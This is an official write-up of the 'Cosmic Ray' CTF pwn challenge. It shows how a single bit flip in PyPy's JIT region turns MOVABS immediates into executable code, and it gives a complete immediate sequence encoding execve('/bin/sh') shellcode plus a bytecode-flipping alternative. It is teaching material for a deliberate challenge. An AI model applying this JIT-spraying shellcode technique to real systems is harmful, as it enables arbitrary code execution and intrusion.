| 1 | +---
| 2 | +title: "Cosmic Ray - Ctrl+Space Quals 2025"
| 3 | +date: "2025-10-02"
| 4 | +description: "The official writeup for the challenge Cosmic Ray from the Ctrl+Space Quals 2025 CTF"
| 5 | +tags: ["pwn", "ctf", "ctrl", "space", "mhackeroni"]
| 6 | +showAuthor: false
| 7 | +---
| 8 | + |
| 9 | +Author: [mebeim](https://github.com/mebeim) (Marco Bonelli) |
| 10 | + |
| 11 | +Full source code of the challenge is available [here](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/).
| 12 | + |
| 13 | +> I had written a perfect program, when all of a sudden... a cosmic ray was |
| 14 | +> enough to pwn my entire system :( |
| 15 | +
| 16 | + |
| 17 | +## Description |
| 18 | + |
| 19 | +*For a TL;DR of the solution, just check the comments in [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py).* |
| 20 | + |
| 21 | +The challenge consists of a simple Python 3 program ([`app.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/src/app.py)) run
| 22 | +by the [PyPy][pypy] interpreter that implements a CLI to create and invoke |
| 23 | +custom Python `lambda` functions. These functions can be created using a limited |
| 24 | +set of whitelisted operations, take a single argument and return a single value. |
| 25 | + |
| 26 | +```none |
| 27 | +Available commands: |
| 28 | + [B]uild a function |
| 29 | + [C]all a function |
| 30 | + [L]ist functions |
| 31 | + [T]rigger a cosmic ray |
| 32 | +
| 33 | +> B |
| 34 | +Name: foo |
| 35 | +Input one operation per line, end with "END": |
| 36 | +> ADD 10 |
| 37 | +> MUL 2 |
| 38 | +> REPEAT 5 |
| 39 | +> LIST |
| 40 | +> END |
| 41 | +Function created! |
| 42 | +
| 43 | +> L |
| 44 | +Currently defined functions: |
| 45 | + foo = lambda x: list(((((x) + 10) * 2) for _ in range(5))) |
| 46 | +
| 47 | +> C |
| 48 | +Name: foo |
| 49 | +Argument: 1 |
| 50 | +Result: [22, 22, 22, 22, 22] |
| 51 | +``` |
| 52 | + |
| 53 | +Other than that, the script also offers an interesting functionality (cosmic |
| 54 | +ray) that allows the user to flip a bit in certain memory areas: |
| 55 | + |
| 56 | +```py |
| 57 | +try: |
| 58 | + where = int(input('Where? '), 0) |
| 59 | +except ValueError: |
| 60 | + raise ValueError('Invalid input') from None |
| 61 | + |
| 62 | +offset = where // 8 |
| 63 | +bit = where % 8 |
| 64 | + |
| 65 | +# ... scan /proc/self/maps and calculate vaddr |
| 66 | + |
| 67 | +from cffi import FFI |
| 68 | +FFI().cast("unsigned char *", vaddr)[0] ^= (1 << bit) |
| 69 | +``` |
| 70 | + |
| 71 | +This bit flip is only allowed in writeable anonymous memory areas, excluding the |
| 72 | +process stack, and is also only allowed once due to a global variable that is |
| 73 | +set after first usage. |
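
To make the `where` encoding concrete, here is a minimal sketch of the arithmetic performed by the snippet above. The helper names (`decode_where`, `encode_where`, `flip_bit`) are hypothetical and not part of `app.py`, and the `bytearray` merely stands in for process memory: how the script turns the byte offset into a virtual address is elided in the snippet and is not modeled here.

```python
def decode_where(where):
    """Split the user-supplied value the same way the challenge snippet does."""
    return where // 8, where % 8


def encode_where(offset, bit):
    """Inverse of decode_where: byte offset and bit index -> 'Where?' value."""
    if not 0 <= bit < 8:
        raise ValueError("bit must be in range(8)")
    return offset * 8 + bit


def flip_bit(buf, where):
    """Flip a single bit of a mutable buffer (a stand-in for process memory)."""
    offset, bit = decode_where(where)
    buf[offset] ^= 1 << bit


memory = bytearray(b"\x00\xbb")
flip_bit(memory, encode_where(1, 3))  # flip bit 3 of the byte at offset 1
print(memory.hex())
```

In other words, picking a target byte and bit amounts to sending `offset * 8 + bit` at the `Where?` prompt.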
| 74 | + |
| 75 | + |
| 76 | +## Goal |
| 77 | + |
| 78 | +The goal is clear: achieve arbitrary code execution to read the contents of the |
| 79 | +`/flag` file. The memory areas where the bit flip is allowed are pretty much |
| 80 | +limited to a handful of anonymous mappings: the interpreter heap (brk), the |
| 81 | +Python heap (where most Python objects live) and a RWX mapping used by PyPy to |
| 82 | +JIT compile Python code whenever it deems it necessary. Anything else is |
| 83 | +seemingly untouchable (bad permissions and/or non-anonymous). |
| 84 | + |
| 85 | +```none |
| 86 | +$ sudo cat /proc/$(pidof pypy3)/maps |
| 87 | +5e177bf9f000-5e177bfa0000 r--p 00000000 00:43 21012271 /usr/bin/pypy3.10-c |
| 88 | +5e177bfa0000-5e177bfa1000 r-xp 00001000 00:43 21012271 /usr/bin/pypy3.10-c |
| 89 | +5e177bfa1000-5e177bfa2000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c |
| 90 | +5e177bfa2000-5e177bfa3000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c |
| 91 | +5e177bfa3000-5e177bfa4000 rw-p 00003000 00:43 21012271 /usr/bin/pypy3.10-c |
| 92 | +5e178c01a000-5e178c01b000 ---p 00000000 00:00 0 [heap] |
| 93 | +5e178c01b000-5e178c01e000 rw-p 00000000 00:00 0 [heap] |
| 94 | +7a2d7cf60000-7a2d7d0d0000 rw-p 00000000 00:00 0 |
| 95 | +7a2d7d0d0000-7a2d7d1d0000 rwxp 00000000 00:00 0 |
| 96 | +7a2d7d1f1000-7a2d7e9c3000 rw-p 00000000 00:00 0 |
| 97 | +... |
| 98 | +``` |
| 99 | + |
| 100 | +Since the script only allows for one bit flip to happen, a viable solution must |
| 101 | +either achieve arbitrary code execution via a single bit flip or use the initial |
| 102 | +bit flip to disable the global variable check and allow for more (preferably |
| 103 | +unlimited) bit flips. |
| 104 | + |
| 105 | + |
| 106 | +## Solution |
| 107 | + |
| 108 | +There are two main solution paths, although one of them remains theoretical and |
| 109 | +I have not spent too much time investigating its feasibility. It is however |
| 110 | +worth mentioning (find it below). |
| 111 | + |
| 112 | +### Altering JITed Code |
| 113 | + |
| 114 | +As you might already know, PyPy3 is known for its ability to Just-In-Time |
| 115 | +compile Python code into machine code (in this case, x86-64). This is done only |
| 116 | +if deemed necessary by the interpreter, which means only for "hot" loops. For |
| 117 | +example, a long enough loop doing calculations or an infinite `while True` loop |
| 118 | +are highly likely to be JITed. The JITed code is written to and executed |
| 119 | +directly from a RWX memory region. This is a prime target for a "cosmic ray". |
| 120 | + |
| 121 | +We can create a "hot" loop within a `lambda` function with the `REPEAT` |
| 122 | +operation, which translates to `((EXPR) for _ in range(N))` where `N` is |
| 123 | +controlled and `EXPR` comes from previous operations (also controlled). |
| 124 | + |
| 125 | +A very simple lambda built with `ADD 0x1122334455` + `REPEAT 9999` + `LIST` will |
| 126 | +be JITed by PyPy at a deterministic offset into the RWX JIT memory area. What's |
| 127 | +more interesting is that a large enough constant (between 5 and 8 bytes) will |
| 128 | +most likely get embedded *as is* into JITed code as an immediate for the x86 |
| 129 | +MOVABS instruction (a.k.a. MOV r64, imm64). We can also notice this |
| 130 | +[in the PyPy codebase][pypy-jit-movabs]. This is also useful to find the |
| 131 | +address/offset of a specific piece of JITed code from GDB: |
| 132 | + |
| 133 | +```none |
| 134 | +$ sudo pwndbg --pid $(pidof pypy3) |
| 135 | +pwndbg> search -t qword --trunc-out 73588229205 |
| 136 | +Searching for an 8-byte integer: b'UD3"\x11\x00\x00\x00' |
| 137 | +[anon_7081faf76] 0x7081faf78679 push rbp /* 0x1122334455 */ |
| 138 | +[anon_7081faf76] 0x7081faf78945 push rbp /* 0x1122334455 */ |
| 139 | +... |
| 140 | +pwndbg> x/10i 0x7081faf78679 - 2 |
| 141 | + 0x7081faf78677: movabs r11,0x1122334455 |
| 142 | + 0x7081faf78681: add rdi,r11 |
| 143 | + 0x7081faf78684: jo 0x7081faf78c17 |
| 144 | +``` |
| 145 | + |
| 146 | +Doing simple mathematical operations with large values gives us a very good |
| 147 | +primitive to inject arbitrary bytes into JITed code via MOVABS. Other ways are |
| 148 | +definitely possible, but MOVABS gives us a lot of space. In particular, we have |
| 149 | +8 controlled immediate bytes ending up in a RWX region. If we can somehow flip |
| 150 | +some bit around the JITed code to jump into the immediate, we can use the first |
| 151 | +6 to run some arbitrary code, and the last two to perform a short jump into the |
| 152 | +immediate of a subsequent MOVABS instruction to continue. |
| 153 | + |
| 154 | +A `lambda` built with a sequence of arithmetical instructions with large |
| 155 | +immediates can easily turn into a sequence of MOVABS instructions. For example: |
| 156 | + |
| 157 | +```none |
| 158 | +ADD 0x1122334455 |
| 159 | +ADD 0x2233445566 |
| 160 | +ADD 0x3344556677 |
| 161 | +REPEAT 10000 |
| 162 | +LIST |
| 163 | +END |
| 164 | +``` |
| 165 | + |
| 166 | +This will become something like:
| 167 | + |
| 168 | +```none |
| 169 | +... |
| 170 | +movabs r11,0x1122334455 |
| 171 | +add rdi,r11 |
| 172 | +jo 0x7bcffd7a0c87 |
| 173 | +mov QWORD PTR [rbx+0x28],0xe |
| 174 | +mov QWORD PTR [rbp+0x158],rdi |
| 175 | +movabs r11,0x2233445566 |
| 176 | +add rdi,r11 |
| 177 | +jo 0x7bcffd7a0ca3 |
| 178 | +mov QWORD PTR [rbx+0x28],0x12 |
| 179 | +mov QWORD PTR [rbp+0x158],rdi |
| 180 | +movabs r11,0x3344556677 |
| 181 | +add rdi,r11 |
| 182 | +jo 0x7bcffd7a0cbf |
| 183 | +... |
| 184 | +``` |
| 185 | + |
| 186 | +Taking a look at how MOVABS is encoded, we have: |
| 187 | + |
| 188 | +```none |
| 189 | +49 bb 55 44 33 22 11 00 00 00 movabs r11, 0x1122334455 |
| 190 | +``` |
| 191 | + |
| 192 | +Flipping bit 3 of the second byte turns the instruction into: |
| 193 | + |
| 194 | +```none |
| 195 | +49 b3 55 rex.WB mov r11b, 0x55 |
| 196 | +44 33 22 xor r12d, DWORD PTR [rdx] |
| 197 | +11 00 adc DWORD PTR [rax], eax |
| 198 | +... |
| 199 | +``` |
| 200 | + |
| 201 | +Other variations are also possible, like: |
| 202 | + |
| 203 | +```none |
| 204 | +49 9b rex.WB fwait |
| 205 | +55 push rbp |
| 206 | +44 33 22 xor r12d, DWORD PTR [rdx] |
| 207 | +11 00 adc DWORD PTR [rax], eax |
| 208 | +... |
| 209 | +``` |
| 210 | + |
| 211 | +*`fwait`... you really never stop learning new x86 instructions, huh?* |
| 212 | + |
| 213 | +One single bit flip is therefore enough to start executing part of the original |
| 214 | +MOVABS immediate we provide as code. We can encode an initial JMP ahead into the |
| 215 | +next immediate, perform some instructions, JMP imm8 to the next, and repeat. |
| 216 | +This is more than enough to pop a shell. |
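
The two flips shown above can be reproduced on the raw instruction bytes with a few lines of Python. This is only a sketch: `flip` is a hypothetical helper, and the bit positions are relative to the start of the instruction, so the value to send at the `Where?` prompt still depends on where the JITed code ends up in memory.

```python
MOVABS_R11 = bytes.fromhex("49bb5544332211000000")  # movabs r11, 0x1122334455


def flip(code, byte_index, bit):
    """Return a copy of `code` with one bit of one byte flipped."""
    patched = bytearray(code)
    patched[byte_index] ^= 1 << bit
    return bytes(patched)


# Bit 3 of the second byte: 0xbb -> 0xb3 (opcode becomes `mov r8, imm8`).
print(flip(MOVABS_R11, 1, 3).hex(" "))
# Bit 5 of the second byte: 0xbb -> 0x9b (opcode becomes `fwait`).
print(flip(MOVABS_R11, 1, 5).hex(" "))
```

In both cases the instruction becomes shorter, so the CPU starts decoding the remaining immediate bytes as new instructions.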
| 217 | + |
| 218 | +The only thing we must pay attention to is a small optimization performed by the |
| 219 | +PyPy JIT compiler when dealing with consecutive integer values that are "close |
| 220 | +enough" to each other (within 32-bit distance). Doing the same as above with |
| 221 | +`ADD 0x1122334455` followed by `ADD 0x1122334466` will JIT compile into: |
| 222 | + |
| 223 | +```none |
| 224 | +movabs r11,0x1122334455 |
| 225 | +add rdi,r11 |
| 226 | +jo 0x7a721ea94c47 |
| 227 | +mov QWORD PTR [rbx+0x28],0xe |
| 228 | +mov QWORD PTR [rbp+0x158],rdi |
| 229 | +lea r11,[r11+0x11] <<<<<< |
| 230 | +add rdi,r11 |
| 231 | +jo 0x7a721ea94c63 |
| 232 | +``` |
| 233 | + |
| 234 | +Not a problem if our immediates are "far enough" from each other in value, but |
| 235 | +even then, all is fine with a bit of juggling around. |
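
A quick sanity check for a list of immediates could look like the sketch below. It assumes that "close enough" means the difference between two consecutive constants fits in a signed 32-bit displacement; the exact condition used by the PyPy backend is not verified here, and `close_pairs` is a hypothetical helper.

```python
def within_32bit_distance(prev, cur):
    """Assumed condition under which the JIT may emit LEA instead of MOVABS."""
    return -(1 << 31) <= cur - prev < (1 << 31)


def close_pairs(immediates):
    """Return consecutive pairs that are likely to be merged into an LEA."""
    return [
        (a, b)
        for a, b in zip(immediates, immediates[1:])
        if within_32bit_distance(a, b)
    ]


print(close_pairs([0x1122334455, 0x1122334466]))                # one risky pair
print(close_pairs([0x1122334455, 0x2233445566, 0x3344556677]))  # no risky pairs
```

Any pair reported by `close_pairs` is a candidate for reordering or for changing padding bytes so that the two values end up further apart.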
| 236 | + |
| 237 | +Now it's GG. We can read in more shellcode, run existing code (we can definitely |
| 238 | +break ASLR now), or even just directly pop a shell via `execve`. The final |
| 239 | +sequence of instructions I used to call |
| 240 | +`execve("/bin/sh", {"/bin/sh", NULL}, NULL)` looks like this: |
| 241 | + |
| 242 | +```none |
| 243 | +ADD 0x01010101011ceb90 -> jmp short $+0x1e |
| 244 | +ADD 0x17eb900068732f68 -> push 0x68732f '/sh\x00' |
| 245 | + jmp short $+0x19 |
| 246 | +ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16 |
| 247 | + jmp short $+0x19 |
| 248 | +ADD 0x17eb6e6924048166 -> add word ptr [rsp], 0x6e69 'in' |
| 249 | + jmp short $+0x19 |
| 250 | +ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16 |
| 251 | + jmp short $+0x19 |
| 252 | +ADD 0x616161000000ede9 -> jmp $+0xf2 |
| 253 | +ADD 0x61eb622f24048166 -> add word ptr [rsp], 0x622f '/b' |
| 254 | + jmp short $+0x63 |
| 255 | +ADD 0x61eb90006ae78948 -> mov rdi, rsp rdi = "/bin/sh" |
| 256 | + push 0 |
| 257 | + jmp short $+0x63 |
| 258 | +ADD 0x61eb9090e6894857 -> push rdi |
| 259 | + mov rsi, rsp rsi = {"/bin/sh", NULL} |
| 260 | + jmp short $+0x63 |
| 261 | +ADD 0x61eb3bb0c031d231 -> xor edx, edx rdx = NULL |
| 262 | + xor eax, eax |
| 263 | + mov al, 0x3b rax = __NR_execve |
| 264 | + jmp short $+0x63 |
| 265 | +ADD 0x61eb90909090050f -> syscall |
| 266 | +REPEAT 10000 |
| 267 | +LIST |
| 268 | +``` |
| 269 | + |
| 270 | +The first instruction is changed from `movabs r11, 0x01010101011ceb90` to |
| 271 | +`rex.WB mov r11b, 0x90; jmp short $+0x1e`, which starts the whole thing. The |
| 272 | +only quirk about this solution is that after a few MOVABS instructions PyPy |
| 273 | +inserts additional checks in the JITed code, causing the offset between |
| 274 | +subsequent MOVABS to change. There is also a big gap in the middle where I have |
| 275 | +to waste an entire immediate to fit a JMP off32 (5 bytes). In any case, no big |
| 276 | +deal. |
| 277 | + |
| 278 | +### Alternate Solution: Altering Python Bytecode |
| 279 | + |
| 280 | +As we all know, Python is an interpreted language with an intermediate bytecode
| 281 | +representation that is executed by the interpreter virtual machine. Instead of |
| 282 | +focusing on what happens after the PyPy JIT kicks in, we could also alter the |
| 283 | +Python bytecode itself. Assuming that the bytecode for script functions is |
| 284 | +stored in one of the memory areas we can modify, and assuming that its offset is |
| 285 | +fixed (or at least stable enough), flipping a bit to modify the bytecode can |
| 286 | +drastically modify the script's behavior. |
| 287 | + |
| 288 | +There is no obvious way to use a single bit flip to obtain arbitrary [byte]code |
| 289 | +execution, let alone re-use some part of existing bytecode to open, read and |
| 290 | +print the contents of an arbitrary file. If we want to modify bytecode we will |
| 291 | +have to do so to bypass the single cosmic ray limit, and then use more cosmic |
| 292 | +rays to edit existing bytecode at will. |
| 293 | + |
| 294 | +If we take a look at the bytecode for the `cosmic_ray()` function using |
| 295 | +[`dis.dis()`][py-dis-dis] we can see a few interesting spots where flipping a |
| 296 | +bit would result in bypassing the global variable check, allowing infinite |
| 297 | +"cosmic rays" to hit. We can also access the raw bytecode as a `bytes` object |
| 298 | +via `cosmic_ray.__code__.co_code` to check actual opcodes and arguments. |
| 299 | + |
| 300 | +Some interesting opcodes to consider for the bit flip are right at the start and
| 301 | +towards the end of the function: |
| 302 | + |
| 303 | +```none |
| 304 | +0 LOAD_GLOBAL 0 (COSMIC_RAY_HIT) |
| 305 | +2 POP_JUMP_IF_FALSE 8 (to 16) |
| 306 | +... |
| 307 | +324 LOAD_CONST 22 (True) |
| 308 | +326 STORE_GLOBAL 0 (COSMIC_RAY_HIT) |
| 309 | +... |
| 310 | +``` |
| 311 | + |
| 312 | +The opcode for `POP_JUMP_IF_FALSE` is 0x72: flipping its LSB turns it into 0x73, |
| 313 | +which is `POP_JUMP_IF_TRUE`. This would simply negate the `if` condition and |
| 314 | +allow for unlimited cosmic rays after the first call to the function (which sets |
| 315 | +`COSMIC_RAY_HIT = True` before returning).
| 316 | + |
| 317 | +Similarly, changing the argument for `STORE_GLOBAL` to something other than 0 |
| 318 | +would cause the script to create a new global variable instead of modifying |
| 319 | +`COSMIC_RAY_HIT`. Modifying one of the above opcodes into something else may |
| 320 | +also work, depending on the specific case. |
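
The arithmetic behind both ideas is a one-bit XOR, as in the sketch below. The opcode value 0x72 is the one quoted above; opcode numbers differ between Python versions, so they are hardcoded here rather than taken from `dis.opmap`. The `toy` function is a hypothetical stand-in for `cosmic_ray()` and is only disassembled, never called.

```python
import dis

POP_JUMP_IF_FALSE = 0x72                    # value quoted in the text above
flipped_opcode = POP_JUMP_IF_FALSE ^ 1      # flip the LSB -> 0x73
flipped_argument = 0 ^ (1 << 3)             # STORE_GLOBAL 0 -> STORE_GLOBAL 8

print(hex(flipped_opcode), flipped_argument)


def toy():
    # Same shape as the check in the challenge: test a global, then set it.
    global HIT
    if HIT:
        raise RuntimeError("already used")
    HIT = True


# Raw bytecode and a readable listing; the output depends on the interpreter.
print(toy.__code__.co_code.hex())
for instr in dis.get_instructions(toy):
    print(instr.offset, instr.opname, instr.arg)
```

Running the same inspection on the real `cosmic_ray()` function under the target interpreter shows which bytes are worth targeting.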
| 321 | + |
| 322 | +There are however a couple of problems with this approach: |
| 323 | + |
| 324 | +1. We are working with offsets into memory, and not absolute addresses. While |
| 325 | + the memory layout seems pretty stable at first, the `cosmic_ray()` function
| 326 | + imports the `cffi` module, causing a bunch of mappings to be created and also |
| 327 | + moving existing Python objects around. This results in a not-so-predictable |
| 328 | + layout after the first invocation. Subsequent invocations to perform more |
| 329 | + bit flips would need to take this into account. |
| 330 | +2. Depending on which opcode we choose to modify and how, we might end up |
| 331 | + crashing the interpreter either via internal check failures or plain and |
| 332 | + simple segmentation faults. For example, I have noticed that changing |
| 333 | + `STORE_GLOBAL 0` to `STORE_GLOBAL 8` (thus creating `FFI = True` globally) |
| 334 | + works on Ubuntu 24 `pypy3`, but crashes with a HLT on Alpine `pypy3` (used
| 335 | + in the challenge container). YMMV. |
| 336 | + |
| 337 | +This is the main reason I did not explore this solution path any further. It |
| 338 | +does however still seem within the realm of possibility. |
| 339 | + |
| 340 | + |
| 341 | +### Complete Exploit |
| 342 | + |
| 343 | +See [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py) for the complete exploit. A simplified version is |
| 344 | +available at [`checker/__main__.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/checker/__main__.py) and is intended to be |
| 345 | +used as an automated status check. |
| 346 | + |
| 347 | + |
| 348 | +[pypy]: https://www.pypy.org |
| 349 | +[pypy-jit-movabs]: https://github.com/pypy/pypy/blob/76657ba47f6d48c7db77615d3a26bd5029f8b05a/rpython/jit/backend/x86/rx86.py#L886 |
| 350 | +[py-dis-dis]: https://docs.python.org/3/library/dis.html#dis.dis |